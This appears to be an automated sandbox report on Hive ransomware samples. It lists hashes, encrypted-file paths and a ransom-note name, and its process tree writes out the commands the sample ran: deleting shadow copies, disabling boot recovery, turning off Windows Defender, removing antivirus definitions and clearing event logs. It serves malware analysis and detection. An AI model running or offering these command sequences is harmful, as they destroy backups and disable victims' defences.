Overview
overview
10Static
static
7Ransomware.Hive.zip
windows7-x64
1Ransomware.Hive.zip
windows10-1703-x64
1211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-1703-x64
10Hive.elf
windows7-x64
3Hive.elf
windows10-1703-x64
3hive.exe
windows7-x64
10hive.exe
windows10-1703-x64
10hive_linux_elf
windows7-x64
1hive_linux_elf
windows10-1703-x64
1linux_hive.elf
windows7-x64
3linux_hive.elf
windows10-1703-x64
3sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-1703-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-1703-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-1703-x64
10Analysis
-
max time kernel
268s -
max time network
255s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
12-02-2024 06:38
Behavioral task
behavioral1
Sample
Ransomware.Hive.zip
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Ransomware.Hive.zip
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
211xahcou.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
211xahcou.exe
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
Hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
hive.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
hive.exe
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
hive_linux_elf
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
hive_linux_elf
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
linux_hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
linux_hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
sjl8j6ap3.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
sjl8j6ap3.exe
Resource
win10-20231215-en
Behavioral task
behavioral15
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10-20231215-en
Behavioral task
behavioral17
Sample
zi1ysv64h.exe
Resource
win7-20231215-en
General
-
Target
zi1ysv64h.exe
-
Size
3.3MB
-
MD5
5384c6825a5707241c11d78529dbbfee
-
SHA1
85f5587e8ad534c2e5de0e72450b61ebda93e4fd
-
SHA256
3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
-
SHA512
856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
-
SSDEEP
49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno
Malware Config
Extracted
C:\Program Files\Common Files\DESIGNER\K8zJ_HOW_TO_DECRYPT.txt
hive
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4452 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 3772 wevtutil.exe 3340 wevtutil.exe 5036 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2228 bcdedit.exe 3704 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.boot.tree.dat.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_EMS_HSC4koA0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-36_altform-unplated_contrast-black.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\drunk.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40_altform-unplated.png zi1ysv64h.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200_contrast-black.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sa_60x42.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_y3GhFSwWaWc0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_f4\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GOTHICBI.TTF.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_T8F5UzNTdTI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Connecting.m4a zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-30.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashSquareTile.scale-100_contrast-black.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.Resource\Xbox.Smartglass.Loc.xml zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_713yhAMFNf00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_aI-ryi8lNzE0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_mTAlKpX2K100.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Ri9aWMBnpgQ0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_ne8jSPg4d6A0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_M4CmfqKR4540.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_contrast-black.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSmallTile.scale-400.png zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Grace-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_J9s-qCDaRkM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_LiTZu90oPq00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\PhotosApp\Assets\ThirdPartyNotices\ThirdPartyNotices.html zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-125_contrast-white.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-32_altform-unplated.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ye_60x42.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Z1NVAGRaBN00.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightItalic.ttf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_FCr3XS22j9Q0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_F0QN2wBT08A0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_z2NA9wuzv5s0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.INF.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_RQ4QiPHhInk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_YOTHbnVr7PQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_RtABN67bpG40.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_yyupuoKPwvI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_o3Bt5SRlzvw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_CPWQZ0sELkU0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\mail.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-200.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_zZ89ajkHl-M0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\2494_24x24x32.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_FOPox1gHYOA0.2o4xo zi1ysv64h.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_sxrvloUdXJE0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_UeHA5v5SFEw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rectangle_icon.png zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Themes\beach.mobile.jpg zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-150.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Yl1A6B6Ez7E0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\InputPersonalization.exe.mui zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\StarClubTile.Small_.jpg zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp6.scale-125.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_e_d01M9eg1w0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_UainiGVAiiU0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\WideTile.scale-125.png zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_pQusvgYVdwE0.2o4xo zi1ysv64h.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 804 sc.exe 2192 sc.exe 860 sc.exe 2612 sc.exe 5076 sc.exe 4912 sc.exe 4504 sc.exe 4632 sc.exe 4148 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2236 vssadmin.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP Conhost.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4056 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 756 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 3920 zi1ysv64h.exe 3920 zi1ysv64h.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3340 wevtutil.exe Token: SeBackupPrivilege 3340 wevtutil.exe Token: SeSecurityPrivilege 3772 wevtutil.exe Token: SeBackupPrivilege 3772 wevtutil.exe Token: SeSecurityPrivilege 5036 Conhost.exe Token: SeBackupPrivilege 5036 Conhost.exe Token: SeIncreaseQuotaPrivilege 1392 wmic.exe Token: SeSecurityPrivilege 1392 wmic.exe Token: SeTakeOwnershipPrivilege 1392 wmic.exe Token: SeLoadDriverPrivilege 1392 wmic.exe Token: SeSystemProfilePrivilege 1392 wmic.exe Token: SeSystemtimePrivilege 1392 wmic.exe Token: SeProfSingleProcessPrivilege 1392 wmic.exe Token: SeIncBasePriorityPrivilege 1392 wmic.exe Token: SeCreatePagefilePrivilege 1392 wmic.exe Token: SeBackupPrivilege 1392 wmic.exe Token: SeRestorePrivilege 1392 wmic.exe Token: SeShutdownPrivilege 1392 wmic.exe Token: SeDebugPrivilege 1392 wmic.exe Token: SeSystemEnvironmentPrivilege 1392 wmic.exe Token: SeRemoteShutdownPrivilege 1392 wmic.exe Token: SeUndockPrivilege 1392 wmic.exe Token: SeManageVolumePrivilege 1392 wmic.exe Token: 33 1392 wmic.exe Token: 34 1392 wmic.exe Token: 35 1392 wmic.exe Token: 36 1392 wmic.exe Token: SeIncreaseQuotaPrivilege 4608 wmic.exe Token: SeSecurityPrivilege 4608 wmic.exe Token: SeTakeOwnershipPrivilege 4608 wmic.exe Token: SeLoadDriverPrivilege 4608 wmic.exe Token: SeSystemProfilePrivilege 4608 wmic.exe Token: SeSystemtimePrivilege 4608 wmic.exe Token: SeProfSingleProcessPrivilege 4608 wmic.exe Token: SeIncBasePriorityPrivilege 4608 wmic.exe Token: SeCreatePagefilePrivilege 4608 wmic.exe Token: SeBackupPrivilege 4608 wmic.exe Token: SeRestorePrivilege 4608 wmic.exe Token: SeShutdownPrivilege 4608 wmic.exe Token: SeDebugPrivilege 4608 wmic.exe Token: SeSystemEnvironmentPrivilege 4608 wmic.exe Token: SeRemoteShutdownPrivilege 4608 wmic.exe Token: SeUndockPrivilege 4608 wmic.exe Token: SeManageVolumePrivilege 4608 wmic.exe Token: 33 4608 wmic.exe Token: 34 4608 wmic.exe Token: 35 4608 wmic.exe Token: 36 4608 wmic.exe Token: SeIncreaseQuotaPrivilege 4608 wmic.exe Token: SeSecurityPrivilege 4608 wmic.exe Token: SeTakeOwnershipPrivilege 4608 wmic.exe Token: SeLoadDriverPrivilege 4608 wmic.exe Token: SeSystemProfilePrivilege 4608 wmic.exe Token: SeSystemtimePrivilege 4608 wmic.exe Token: SeProfSingleProcessPrivilege 4608 wmic.exe Token: SeIncBasePriorityPrivilege 4608 wmic.exe Token: SeCreatePagefilePrivilege 4608 wmic.exe Token: SeBackupPrivilege 4608 wmic.exe Token: SeRestorePrivilege 4608 wmic.exe Token: SeShutdownPrivilege 4608 wmic.exe Token: SeDebugPrivilege 4608 wmic.exe Token: SeSystemEnvironmentPrivilege 4608 wmic.exe Token: SeRemoteShutdownPrivilege 4608 wmic.exe Token: SeUndockPrivilege 4608 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4056 notepad.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3920 wrote to memory of 2936 3920 zi1ysv64h.exe 164 PID 3920 wrote to memory of 2936 3920 zi1ysv64h.exe 164 PID 2936 wrote to memory of 308 2936 net.exe 89 PID 2936 wrote to memory of 308 2936 net.exe 89 PID 3920 wrote to memory of 3952 3920 zi1ysv64h.exe 162 PID 3920 wrote to memory of 3952 3920 zi1ysv64h.exe 162 PID 3952 wrote to memory of 1068 3952 net.exe 160 PID 3952 wrote to memory of 1068 3952 net.exe 160 PID 3920 wrote to memory of 4412 3920 zi1ysv64h.exe 159 PID 3920 wrote to memory of 4412 3920 zi1ysv64h.exe 159 PID 4412 wrote to memory of 3484 4412 net.exe 28 PID 4412 wrote to memory of 3484 4412 net.exe 28 PID 3920 wrote to memory of 4584 3920 zi1ysv64h.exe 157 PID 3920 wrote to memory of 4584 3920 zi1ysv64h.exe 157 PID 4584 wrote to memory of 1948 4584 net.exe 155 PID 4584 wrote to memory of 1948 4584 net.exe 155 PID 3920 wrote to memory of 2628 3920 zi1ysv64h.exe 154 PID 3920 wrote to memory of 2628 3920 zi1ysv64h.exe 154 PID 2628 wrote to memory of 3596 2628 net.exe 152 PID 2628 wrote to memory of 3596 2628 net.exe 152 PID 3920 wrote to memory of 1832 3920 zi1ysv64h.exe 151 PID 3920 wrote to memory of 1832 3920 zi1ysv64h.exe 151 PID 1832 wrote to memory of 2900 1832 net.exe 149 PID 1832 wrote to memory of 2900 1832 net.exe 149 PID 3920 wrote to memory of 2864 3920 zi1ysv64h.exe 148 PID 3920 wrote to memory of 2864 3920 zi1ysv64h.exe 148 PID 2864 wrote to memory of 4992 2864 net.exe 146 PID 2864 wrote to memory of 4992 2864 net.exe 146 PID 3920 wrote to memory of 1116 3920 zi1ysv64h.exe 145 PID 3920 wrote to memory of 1116 3920 zi1ysv64h.exe 145 PID 1116 wrote to memory of 1416 1116 net.exe 71 PID 1116 wrote to memory of 1416 1116 net.exe 71 PID 3920 wrote to memory of 4776 3920 zi1ysv64h.exe 144 PID 3920 wrote to memory of 4776 3920 zi1ysv64h.exe 144 PID 4776 wrote to memory of 4680 4776 net.exe 142 PID 4776 wrote to memory of 4680 4776 net.exe 142 PID 3920 wrote to memory of 2612 3920 zi1ysv64h.exe 141 PID 3920 wrote to memory of 2612 3920 zi1ysv64h.exe 141 PID 3920 wrote to memory of 4148 3920 zi1ysv64h.exe 139 PID 3920 wrote to memory of 4148 3920 zi1ysv64h.exe 139 PID 3920 wrote to memory of 804 3920 zi1ysv64h.exe 31 PID 3920 wrote to memory of 804 3920 zi1ysv64h.exe 31 PID 3920 wrote to memory of 860 3920 zi1ysv64h.exe 137 PID 3920 wrote to memory of 860 3920 zi1ysv64h.exe 137 PID 3920 wrote to memory of 4632 3920 zi1ysv64h.exe 135 PID 3920 wrote to memory of 4632 3920 zi1ysv64h.exe 135 PID 3920 wrote to memory of 4504 3920 zi1ysv64h.exe 134 PID 3920 wrote to memory of 4504 3920 zi1ysv64h.exe 134 PID 3920 wrote to memory of 4912 3920 zi1ysv64h.exe 132 PID 3920 wrote to memory of 4912 3920 zi1ysv64h.exe 132 PID 3920 wrote to memory of 2192 3920 zi1ysv64h.exe 130 PID 3920 wrote to memory of 2192 3920 zi1ysv64h.exe 130 PID 3920 wrote to memory of 5076 3920 zi1ysv64h.exe 128 PID 3920 wrote to memory of 5076 3920 zi1ysv64h.exe 128 PID 3920 wrote to memory of 1644 3920 zi1ysv64h.exe 126 PID 3920 wrote to memory of 1644 3920 zi1ysv64h.exe 126 PID 3920 wrote to memory of 3712 3920 zi1ysv64h.exe 124 PID 3920 wrote to memory of 3712 3920 zi1ysv64h.exe 124 PID 3920 wrote to memory of 1168 3920 zi1ysv64h.exe 122 PID 3920 wrote to memory of 1168 3920 zi1ysv64h.exe 122 PID 3920 wrote to memory of 2224 3920 zi1ysv64h.exe 120 PID 3920 wrote to memory of 2224 3920 zi1ysv64h.exe 120 PID 3920 wrote to memory of 4728 3920 zi1ysv64h.exe 118 PID 3920 wrote to memory of 4728 3920 zi1ysv64h.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:804
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2280
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2236
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4956
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3792
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2596
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2228
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3704
-
-
